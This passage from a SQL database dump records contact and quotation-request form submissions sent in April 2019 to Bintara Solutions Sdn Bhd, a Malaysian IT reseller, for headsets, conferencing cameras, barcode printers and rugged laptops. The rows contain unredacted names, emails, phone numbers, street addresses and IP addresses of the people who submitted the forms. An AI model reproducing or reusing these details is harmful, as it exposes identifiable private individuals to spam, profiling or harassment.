digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-15 12:08:44','175.139.178.157','1'),(151,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Beatriz Suarez\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"suarez.beatriz.v@gmail.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01112317081\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"N/A\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Petaling Jaya, Selangor\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:64:\"Jabra Evolve 75e, Jabra Evolve 75, Jabra Evolve 65 Stereo / Mono\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:80:\"Hi, is it possible to buy just 1 unit? Usually have calls outside of the office.\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-15 15:26:26','113.210.103.251','1'),(152,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Jesthrine Lee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"ghlee@my.pansing.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"+60356310794 ext 205\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Pansing Distribution Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:97:\"1st Floor Lot 557 AB, Jalan Subang 3, Subang Jaya Industrial Estate, 47610 Subang Jaya, Selangor.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"Logitech Connect, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-17 08:36:38','58.26.21.203','1'),(153,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"AZHAR AHMAD\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"azhar.ahmad@digicity.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0197253978\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"DIGICITY (M) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:152:\"Can we have the price of BAR CODE PRINTER ZEBRA (GX430T) THERMAL TRANSFER RIBBON MATERIAL : RESIN SIZE : 110 mm x 70 m, TYPE : E810, 2 Cores, Winding F0\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"39\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-17 08:43:41','14.192.215.233','1'),(154,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"DESIREE\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"desiree@neg.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0355430133\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Nippon Electric Glass (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Price for Zebra ZP 505 EPL Thermal Barcode Printer\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-17 13:25:35','175.136.193.122','1'),(155,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Chooi\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"chooi@scanmac.net\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192730556\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Scanmac System Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:67:\"Hi, we wish to request quote for 2 units of Jabra Speak 710. Thanks\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"17\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-17 15:47:50','121.122.65.83','1'),(156,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"ying chiun kiat\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"alanying22@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162627566\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"IES\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:60:\"113,Jalan TU 3 ,Taman Tasik Utama, 75450, Ayer Keroh ,Melaka\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:58:\"TOUGHBOOK 33, TOUGHBOOK 54, TOUGHPAD FZ-M1, TOUGHPAD FZ-G1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"75\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-19 16:25:56','60.51.32.159','1'),(157,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"Jeff\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"info@totalsoutdoor.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"012 2298884\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Totals\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Interested in synology\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"22\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-20 11:38:43','60.53.222.227','1'),(158,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Fadzrill Omar\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"fadzrillomar@gmail.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017 2233329\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:1:\"-\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:39:\"3369 JALAN KEMBOJA SEKSYEN U5 SHAH ALAM\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Jabra Evolve 